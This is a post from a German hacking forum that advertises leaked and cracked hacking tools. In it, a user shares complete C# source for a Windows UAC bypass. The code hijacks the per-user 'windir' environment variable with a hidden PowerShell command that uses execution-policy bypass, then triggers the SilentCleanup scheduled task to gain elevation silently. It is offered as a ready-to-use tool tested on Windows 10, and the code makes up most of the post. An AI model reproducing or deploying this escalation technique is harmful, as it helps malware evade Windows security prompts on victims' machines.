Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[C#] UAC Bypass

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
IRET

IRET

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    71
  • 17 Beiträge
  • 7 Bedankt

Sollte mit den meisten Windows Systemen funktionieren. Getestet unter aktuellstem Windows 10.

Powershell sollte nicht ganz deaktiviert sein (Bypasses sind natürlich mit drinnen).

Useraccount muss Adminrechte haben. Es umgeht nur den UAC-Dialog.

using System;
using System.Security.Principal;
using Microsoft.Win32;
using System.Diagnostics;
using System.Threading;

 
namespace UAC_Bypass
{
    static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main()
        {
            bool isElevated = false;
            using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
            {
                WindowsPrincipal principal = new WindowsPrincipal(identity);
                isElevated = principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
 
            if (isElevated)
            {
                System.IO.File.WriteAllText("C:\\windows\\test.txt", "xyz");
            }
            else
            {
                // UAC bypass
                using (RegistryKey key = Registry.CurrentUser.OpenSubKey("Environment", true))
                {
                    key.SetValue("windir", "powershell -ep bypass -w h -Command \"& " + System.Reflection.Assembly.GetEntryAssembly().Location + "\";#", RegistryValueKind.ExpandString);
                    Process.Start("schtasks", "/run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I");
                    Thread.Sleep(5000);
                }

                using (RegistryKey key = Registry.CurrentUser.OpenSubKey("Environment", true))
                {
                    key.DeleteValue("windir");
                }
            }
        }
    }
}

Bearbeitet von IRET, 24 Januar 2020 - 10:37 Uhr.

  • Ch!ller, Born2Hack, loken und 3 anderen gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen: 0

Mitglieder: 0, Gäste: 0, unsichtbare Mitglieder: 0

Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.